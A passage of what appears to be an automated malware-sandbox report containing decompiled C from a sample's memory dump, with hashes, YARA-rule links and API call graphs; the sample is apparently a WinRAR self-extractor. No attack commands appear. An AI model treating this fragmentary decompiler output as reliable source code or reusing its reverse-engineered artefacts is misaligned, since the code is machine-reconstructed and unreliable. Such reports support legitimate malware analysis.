						if(_t9 == 0) {
							_t11 = L"?*";
						}
						_push( *_t18 & 0x0000ffff);
						_push(_t11);
						if(E003F22C6(_t11) != 0 || _t9 != 0 &&  *_t18 < 0x20) {
							_t14 = 0x5f;
							 *_t18 = _t14;
						} else {
							_t14 = 0x5f;
						}
						_t7 = _t16 & 0xfffffffe;
						if(_t7 > 2 &&  *_t18 == 0x3a) {
							 *_t18 = _t14;
						}
						_t18 =  &(_t18[1]);
						_t16 = _t16 + 2;
					} while ( *_t18 != 0);
					return _t7;
				}
				return _t3;
			}










                0x003dc05a
                0x003dc063
                0x003dc066
                0x003dc06b
                0x003dc06d
                0x003dc06d
                0x003dc074
                0x003dc076
                0x003dc076
                0x003dc07e
                0x003dc07f
                0x003dc089
                0x003dc097
                0x003dc098
                0x003dc09d
                0x003dc09f
                0x003dc09f
                0x003dc0a2
                0x003dc0a8
                0x003dc0b0
                0x003dc0b0
                0x003dc0b3
                0x003dc0b6
                0x003dc0b9
                0x00000000
                0x003dc0bf
                0x003dc0c2

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _wcschr
                • String ID: <9@$?*<>|"
                • API String ID: 2691759472-3171408235
                • Opcode ID: 1934aaa2e8a06904d5ff0edd58a555a50ea4fe48e84e67f871b08ea724b2fbd7
                • Instruction ID: 8daff1439189f03433c9bf3c5212df19106509482f0b02597c00bd917d4f4da0
                • Opcode Fuzzy Hash: 1934aaa2e8a06904d5ff0edd58a555a50ea4fe48e84e67f871b08ea724b2fbd7
                • Instruction Fuzzy Hash: 11F0A253574303C1C7321E247801732E3E9EF91320B29581FE5C4973C2EAA5C880C295
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EDB4B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                Download Yara Rule
                C-Code - Quality: 37%
                			E003EDB4B(intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v4108;
				void* _t12;
				void* _t17;
				void* _t23;

				_t12 = E003EEC50(0x1008);
				if( *0x41a470 != 0) {
					_t27 =  *0x41a472;
					if( *0x41a472 != 0) {
						E003EC6F0(_t27, 0x41a472,  &_v4108, 0x800);
						_t17 =  *0x433014(0x80000001, L"Software\\WinRAR SFX", 0, 0, 0, 0x20006, 0,  &_v8,  &_v12, _t23);
						if(_t17 == 0) {
							 *0x433020(_v8,  &_v4108, 0, 1, _a4, 2 + E003F3E13(_a4) * 2);
							_t17 =  *0x433008(_v8);
						}
						return _t17;
					}
				}
				return _t12;
			}









                0x003edb53
                0x003edb5f
                0x003edb61
                0x003edb69
                0x003edb7d
                0x003edb9f
                0x003edba7
                0x003edbca
                0x003edbd3
                0x003edbd3
                0x00000000
                0x003edbd9
                0x003edb69
                0x003edbdb

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _wcslen
                • String ID: Software\WinRAR SFX$>
                • API String ID: 176396367-2078124420
                • Opcode ID: e13d2962d4d9a115344dd1ba3a5a1449ef3448bf08e736841fbdf6a8012cc6d2
                • Instruction ID: 2492a129ddd01f83fa29f5c65f4ae3e863daccc2e5617e0a9c7f8a2b3cff419c
                • Opcode Fuzzy Hash: e13d2962d4d9a115344dd1ba3a5a1449ef3448bf08e736841fbdf6a8012cc6d2
                • Instruction Fuzzy Hash: 48018F31901168FAEF229F92DC0AFDF7F7CEF04391F004062B509A50A4D7B04A98CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FBB4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 69%
                			E003FBB4E(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				intOrPtr _t20;
				signed int _t25;
				void* _t30;
				intOrPtr _t32;
				void* _t33;
				void* _t38;

				_t28 = __edx;
				_t23 = __ebx;
				_push(0xc);
				_push(0x40c428);
				E003EF5F0(__ebx, __edi, __esi);
				_t32 = 0;
				 *((intOrPtr*)(_t33 - 0x1c)) = 0;
				_t30 = E003F97E5(__ebx, __ecx, __edx);
				_t25 =  *0x40eef0; // 0xfffffffe
				if(( *(_t30 + 0x350) & _t25) == 0 ||  *((intOrPtr*)(_t30 + 0x4c)) == 0) {
					L5:
					_t15 = E003FAC31(5);
					 *((intOrPtr*)(_t33 - 4)) = _t32;
					_t32 =  *((intOrPtr*)(_t30 + 0x48));
					 *((intOrPtr*)(_t33 - 0x1c)) = _t32;
					_t38 = _t32 -  *0x40ee90; // 0x2b62370
					if(_t38 != 0) {
						if(_t32 != 0) {
							asm("lock xadd [esi], eax");
							if((_t15 | 0xffffffff) == 0 && _t32 != 0x40ec70) {
								E003F8DCC(_t32);
							}
						}
						_t20 =  *0x40ee90; // 0x2b62370
						 *((intOrPtr*)(_t30 + 0x48)) = _t20;
						_t32 =  *0x40ee90; // 0x2b62370
						 *((intOrPtr*)(_t33 - 0x1c)) = _t32;
						asm("lock inc dword [esi]");
					}
					 *((intOrPtr*)(_t33 - 4)) = 0xfffffffe;
					E003FBBDF();
					goto L3;
				} else {
					_t32 =  *((intOrPtr*)(_t30 + 0x48));
					L3:
					if(_t32 != 0) {
						return E003EF640(_t32);
					}
					E003F8D24(_t23, _t28, _t30, _t32);
					goto L5;
				}
			}










                0x003fbb4e
                0x003fbb4e
                0x003fbb4e
                0x003fbb50
                0x003fbb55
                0x003fbb5a
                0x003fbb5c
                0x003fbb64
                0x003fbb66
                0x003fbb72
                0x003fbb85
                0x003fbb87
                0x003fbb8d
                0x003fbb90
                0x003fbb93
                0x003fbb96
                0x003fbb9c
                0x003fbba0
                0x003fbba5
                0x003fbba9
                0x003fbbb4
                0x003fbbb9
                0x003fbba9
                0x003fbbba
                0x003fbbbf
                0x003fbbc2
                0x003fbbc8
                0x003fbbcb
                0x003fbbcb
                0x003fbbce
                0x003fbbd5
                0x00000000
                0x003fbb79
                0x003fbb79
                0x003fbb7c
                0x003fbb7e
                0x003fbbef
                0x003fbbef
                0x003fbb80
                0x00000000
                0x003fbb80

                APIs
                  • Part of subcall function 003F97E5: GetLastError.KERNEL32(?,00411098,003F4674,00411098,?,?,003F40EF,?,?,00411098), ref: 003F97E9
                  • Part of subcall function 003F97E5: _free.LIBCMT ref: 003F981C
                  • Part of subcall function 003F97E5: SetLastError.KERNEL32(00000000,?,00411098), ref: 003F985D
                  • Part of subcall function 003F97E5: _abort.LIBCMT ref: 003F9863
                • _abort.LIBCMT ref: 003FBB80
                • _free.LIBCMT ref: 003FBBB4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ErrorLast_abort_free
                • String ID: p@
                • API String ID: 289325740-1482256116
                • Opcode ID: e2a18a1e51b36a7e0bd8dfe0702916b9141c3c0b41a9df45b8c02dcc3be645ae
                • Instruction ID: 2fe825dab8a05c4573fb6073226180ca907dd978e623e3972a1c8667ec270569
                • Opcode Fuzzy Hash: e2a18a1e51b36a7e0bd8dfe0702916b9141c3c0b41a9df45b8c02dcc3be645ae
                • Instruction Fuzzy Hash: BF01A1B1D00A2D9BCB23AF59C40163DF760BF04B20B16061AEA147B291CB756D018BC5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EB425 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Malloc
                • String ID: (>$Z>
                • API String ID: 2696272793-2378772192
                • Opcode ID: 1e1a1b8b263328a9ffdfaa5be179f214f258c4e7aee9ff84d2eeccbd8829646f
                • Instruction ID: 4d24e6d89e06a6032ac592ce7d9fe50581f83ec4a68427c258bee106e82ddd92
                • Opcode Fuzzy Hash: 1e1a1b8b263328a9ffdfaa5be179f214f258c4e7aee9ff84d2eeccbd8829646f
                • Instruction Fuzzy Hash: 7E0146B6600118FFDF069FB1DD49CEEBBBDEF083457000169B906D7160E631AA44DBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F8268 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003F8268(void* __eax, void* __ebx, void* __ecx, void* __edx) {

				 *((intOrPtr*)(__ebx + __eax + 0x33)) =  *((intOrPtr*)(__ebx + __eax + 0x33)) + __edx;
			}



                0x003f826d

                APIs
                  • Part of subcall function 003FBF30: GetEnvironmentStringsW.KERNEL32 ref: 003FBF39
                  • Part of subcall function 003FBF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003FBF5C
                  • Part of subcall function 003FBF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 003FBF82
                  • Part of subcall function 003FBF30: _free.LIBCMT ref: 003FBF95
                  • Part of subcall function 003FBF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 003FBFA4
                • _free.LIBCMT ref: 003F82AE
                • _free.LIBCMT ref: 003F82B5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                • String ID: 0"C
                • API String ID: 400815659-2471324296
                • Opcode ID: 5bbba4942774da12651efd7f4fe6626ec1b499b9a272bba8466946f90b609292
                • Instruction ID: 0da84b1db9b26be7bf7d5b728a0dd813c29983ec2a7f868752edad622df43055
                • Opcode Fuzzy Hash: 5bbba4942774da12651efd7f4fe6626ec1b499b9a272bba8466946f90b609292
                • Instruction Fuzzy Hash: 91E0E53360694A61D76B33396C0267F16044F82338B151A66F7108E1C3CF94880204A6
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003E0FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                Download Yara Rule
                C-Code - Quality: 79%
                			E003E0FE4(void* __ecx, void* __ebp, void* _a4) {
				void* __esi;
				long _t2;
				void* _t6;

				_t6 = __ecx;
				_t2 = WaitForSingleObject(_a4, 0xffffffff);
				if(_t2 == 0xffffffff) {
					_push(GetLastError());
					return E003D6C31(E003D6C36(_t6, 0x411098, L"\nWaitForMultipleObjects error %d, GetLastError %d", 0xffffffff), 0x411098, 0x411098, 2);
				}
				return _t2;
			}






                0x003e0fe4
                0x003e0fea
                0x003e0ff3
                0x003e0ffc
                0x00000000
                0x003e101b
                0x003e101c

                APIs
                • WaitForSingleObject.KERNEL32(?,000000FF,003E1101,?,?,003E117F,?,?,?,?,?,003E1169), ref: 003E0FEA
                • GetLastError.KERNEL32(?,?,003E117F,?,?,?,?,?,003E1169), ref: 003E0FF6
                  • Part of subcall function 003D6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003D6C54
                Strings
                • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 003E0FFF
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                • String ID: WaitForMultipleObjects error %d, GetLastError %d
                • API String ID: 1091760877-2248577382
                • Opcode ID: 89c0450267ea89ca489d3a028f13e8c1936b9bdb52071cf087227ff2735393af
                • Instruction ID: 887449fe0433152aba57e317a3b2a573d5984f7e8da2d2f7f14ba241ac387542
                • Opcode Fuzzy Hash: 89c0450267ea89ca489d3a028f13e8c1936b9bdb52071cf087227ff2735393af
                • Instruction Fuzzy Hash: E0D02B72A0413076C61137246D06E6E3C088B52332F604726F238752F5CB340D814299
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003DE29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003DE29E(void* __ecx) {
				struct HRSRC__* _t3;
				void* _t5;

				_t5 = __ecx;
				_t3 = FindResourceW(GetModuleHandleW(0), L"RTL", 5);
				if(_t3 != 0) {
					 *((char*)(_t5 + 0x64)) = 1;
					return _t3;
				}
				return _t3;
			}





                0x003de2a1
                0x003de2b1
                0x003de2b9
                0x003de2bb
                0x00000000
                0x003de2bb
                0x003de2c0

                APIs
                • GetModuleHandleW.KERNEL32(00000000,?,003DDA55,?), ref: 003DE2A3
                • FindResourceW.KERNEL32(00000000,RTL,00000005,?,003DDA55,?), ref: 003DE2B1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: FindHandleModuleResource
                • String ID: RTL
                • API String ID: 3537982541-834975271
                • Opcode ID: b66154161761d711ec6d3ea3a8eb838aa5d02ded15bd6be150301bbaa4bd8689
                • Instruction ID: 183887d06d6b14ca3a74fb1d2676f97067c37026def48c54070c78d8bd56ed6f
                • Opcode Fuzzy Hash: b66154161761d711ec6d3ea3a8eb838aa5d02ded15bd6be150301bbaa4bd8689
                • Instruction Fuzzy Hash: 9AC0123124171066E6312B657D4DB436E5C5B00B12F050469B581F92D5D6B5C94086A4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE47A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003EE47A() {

				E003EE85D(0x40c62c, 0x433040);
				goto __eax;
			}



                0x003ee467
                0x003ee46e

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE467
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: p>$z>
                • API String ID: 1269201914-2390048133
                • Opcode ID: 62c0edf37abc25c4d38b429818c7b81ac9a59c3a98ba044a0841b7e08e416307
                • Instruction ID: 467801053a0d67ea0f42656c7cbf2998fa70944a2c802ba5bd2730eab6bb04aa
                • Opcode Fuzzy Hash: 62c0edf37abc25c4d38b429818c7b81ac9a59c3a98ba044a0841b7e08e416307
                • Instruction Fuzzy Hash: 4AB012E2258090BD750952171D02E3B011CC0C4F11730973FF424D44C2DE4C0E080C36
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EE455 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003EE455() {

				E003EE85D(0x40c62c, 0x433044);
				goto __eax;
			}



                0x003ee467
                0x003ee46e

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 003EE467
                  • Part of subcall function 003EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003EE8D0
                  • Part of subcall function 003EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003EE8E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: U>$p>
                • API String ID: 1269201914-856557233
                • Opcode ID: a6b6dd75d8340a60e15211e88ca74ecbd7ed1f724682230e1727e90e4b2629dc
                • Instruction ID: 51265c5772aa74c22074c5716e0c1002a1de003ba2208fdfa47cd73ce36745fc
                • Opcode Fuzzy Hash: a6b6dd75d8340a60e15211e88ca74ecbd7ed1f724682230e1727e90e4b2629dc
                • Instruction Fuzzy Hash: 22B012E2258090BD750912131D02C3B021CC0C0F11730D73FF620D44C6DE490E490C36
                Uniqueness

                Uniqueness Score: -1.00%

                Execution Graph

                Execution Coverage:5.5%
                Dynamic/Decrypted Code Coverage:100%
                Signature Coverage:2.5%
                Total number of Nodes:2000
                Total number of Limit Nodes:69
                execution_graph 63565 bc0779 63570 bc0d65 SetUnhandledExceptionFilter 63565->63570 63567 bc077e pre_c_initialization 63571 bc5339 63567->63571 63569 bc0789 63570->63567 63572 bc535f 63571->63572 63573 bc5345 63571->63573 63572->63569 63573->63572 63576 bd2b7c 19 API calls __wsopen_s 63573->63576 63575 bc535a 63575->63569 63576->63575 63577 bf64f9 63584 bc016b 63577->63584 63579 bf6500 63582 bf6519 __fread_nolock 63579->63582 63593 bc019b 63579->63593 63581 bc019b 9 API calls 63583 bf653e 63581->63583 63582->63581 63586 bc0170 63584->63586 63585 bc018a 63585->63579 63586->63585 63589 bc018c 63586->63589 63602 bc523d 7 API calls 2 library calls 63586->63602 63588 bc09fe 63590 bc0a0c __CxxThrowException 63588->63590 63589->63588 63591 bc09ef __CxxThrowException 63589->63591 63592 bc0a22 63590->63592 63591->63588 63592->63579 63594 bc016b 63593->63594 63595 bc018a 63594->63595 63598 bc018c 63594->63598 63603 bc523d 7 API calls 2 library calls 63594->63603 63595->63582 63597 bc09fe 63599 bc0a0c __CxxThrowException 63597->63599 63598->63597 63600 bc09ef __CxxThrowException 63598->63600 63601 bc0a22 63599->63601 63600->63597 63601->63582 63602->63586 63603->63594 63604 ba367c 63607 ba3696 63604->63607 63606 ba3690 63608 ba36ad 63607->63608 63609 ba36b2 63608->63609 63610 ba3711 63608->63610 63633 ba36df 63608->63633 63614 ba378b PostQuitMessage 63609->63614 63615 ba36bf 63609->63615 63612 be3dce 63610->63612 63613 ba3717 63610->63613 63611 ba36f6 DefWindowProcW 63634 ba3704 63611->63634 63646 ba2f24 7 API calls 63612->63646 63616 ba371e 63613->63616 63617 ba3743 SetTimer RegisterWindowMessageW 63613->63617 63614->63634 63618 ba36ca 63615->63618 63619 be3e3b 63615->63619 63622 be3d6f 63616->63622 63623 ba3727 KillTimer 63616->63623 63624 ba376c CreatePopupMenu 63617->63624 63617->63634 63625 ba36d4 63618->63625 63626 ba3795 63618->63626 63649 c0c80c 21 API calls ___scrt_fastfail 63619->63649 63621 be3def 63647 bbf1c6 12 API calls 63621->63647 63631 be3daa MoveWindow 63622->63631 63632 be3d74 63622->63632 63623->63634 63624->63634 63625->63611 63625->63633 63648 c01367 9 API calls 63625->63648 63640 bbfcbb 63626->63640 63628 be3e4d 63628->63611 63628->63634 63631->63634 63635 be3d7a 63632->63635 63636 be3d99 SetFocus 63632->63636 63633->63611 63633->63634 63634->63606 63635->63633 63637 be3d83 63635->63637 63636->63634 63645 ba2f24 7 API calls 63637->63645 63641 bbfd59 63640->63641 63643 bbfcd3 ___scrt_fastfail 63640->63643 63641->63634 63642 bbfd42 KillTimer SetTimer 63642->63641 63643->63642 63644 bffdcb Shell_NotifyIconW 63643->63644 63644->63642 63645->63634 63646->63621 63647->63633 63648->63633 63649->63628 63650 ba1033 63655 ba6686 63650->63655 63654 ba1042 63656 ba66f4 63655->63656 63662 ba55cc 63656->63662 63659 ba6791 63660 ba1038 63659->63660 63665 ba68e6 11 API calls __fread_nolock 63659->63665 63661 bc0433 22 API calls __onexit 63660->63661 63661->63654 63666 ba55f8 63662->63666 63665->63659 63667 ba55eb 63666->63667 63668 ba5605 63666->63668 63667->63659 63668->63667 63669 ba560c RegOpenKeyExW 63668->63669 63669->63667 63670 ba5626 RegQueryValueExW 63669->63670 63671 ba565c RegCloseKey 63670->63671 63672 ba5647 63670->63672 63671->63667 63672->63671 63673 baf470 63676 bb9fa5 63673->63676 63675 baf47c 63677 bb9fc6 63676->63677 63681 bba023 63676->63681 63677->63681 63682 bb02f0 63677->63682 63679 bb9ff7 63679->63681 63695 babe6d 63679->63695 63681->63675 63684 bb0326 messages 63682->63684 63683 bc0433 22 API calls pre_c_initialization 63683->63684 63684->63683 63685 bc0588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 63684->63685 63686 bc016b 9 API calls 63684->63686 63687 bb1645 63684->63687 63688 bf5c7f 63684->63688 63690 babe6d 9 API calls 63684->63690 63693 bc05d2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 63684->63693 63694 bb044d messages 63684->63694 63699 bb1940 63684->63699 63685->63684 63686->63684 63689 babe6d 9 API calls 63687->63689 63687->63694 63692 babe6d 9 API calls 63688->63692 63688->63694 63689->63694 63690->63684 63692->63694 63693->63684 63694->63679 63696 babe90 __fread_nolock 63695->63696 63697 babe81 63695->63697 63696->63681 63697->63696 63698 bc019b 9 API calls 63697->63698 63698->63696 63700 bb19de 63699->63700 63701 bb1966 63699->63701 63702 bb19ed 63700->63702 63703 bf69f1 63700->63703 63704 bb1973 63701->63704 63706 bf6af8 63701->63706 63709 bb02f0 143 API calls 63702->63709 63730 bb1aa4 messages 63702->63730 63735 bb1990 messages 63702->63735 63736 bb19d3 messages 63702->63736 63705 bf69fc 63703->63705 63703->63706 63710 bf6b28 63704->63710 63711 bb197d 63704->63711 63737 bbb2d6 143 API calls 63705->63737 63738 c284db 62 API calls 2 library calls 63706->63738 63709->63702 63712 bf6b64 63710->63712 63716 bf6b86 63710->63716 63710->63736 63713 babe6d 9 API calls 63711->63713 63711->63735 63739 c284db 62 API calls 2 library calls 63712->63739 63713->63735 63715 bf6d7d 63717 bf6db3 63715->63717 63817 c280ce 37 API calls 63715->63817 63724 bf6bac 63716->63724 63726 bf6c25 63716->63726 63719 bab3fe 9 API calls 63717->63719 63719->63736 63720 babe6d 9 API calls 63720->63735 63721 bf6d91 63723 ba8e70 11 API calls 63721->63723 63731 bf6d99 _wcslen 63723->63731 63740 c113a0 9 API calls 63724->63740 63798 c113a0 9 API calls 63726->63798 63727 bf6d63 _wcslen 63727->63715 63813 bab3fe 63727->63813 63728 bf6bd6 63741 bb2ad0 63728->63741 63730->63720 63730->63735 63730->63736 63731->63717 63733 bab3fe 9 API calls 63731->63733 63733->63717 63735->63715 63735->63736 63799 ba8e70 63735->63799 63736->63684 63737->63730 63738->63735 63739->63735 63740->63728 63742 bb2f70 63741->63742 63743 bb2b36 63741->63743 64109 bc05d2 5 API calls __Init_thread_wait 63742->64109 63745 bf7b7c 63743->63745 63818 bb30e0 63743->63818 63745->63735 63746 bb2f7a 63748 bb2fbb 63746->63748 64110 bab25f 63746->64110 63753 bb2fec 63748->63753 63770 bb2d87 messages 63748->63770 63751 bb30e0 9 API calls 63752 bb2b76 63751->63752 63752->63748 63772 bb2bac __fread_nolock 63752->63772 63754 bab3fe 9 API calls 63753->63754 63755 bb2ff9 63754->63755 64117 bbe662 143 API calls 63755->64117 63756 bb2f94 64116 bc0588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 63756->64116 63759 bb2cef 63760 bf7c1c 63759->63760 63761 bb2cfc 63759->63761 64118 c260a2 12 API calls _wcslen 63760->64118 63763 bb30e0 9 API calls 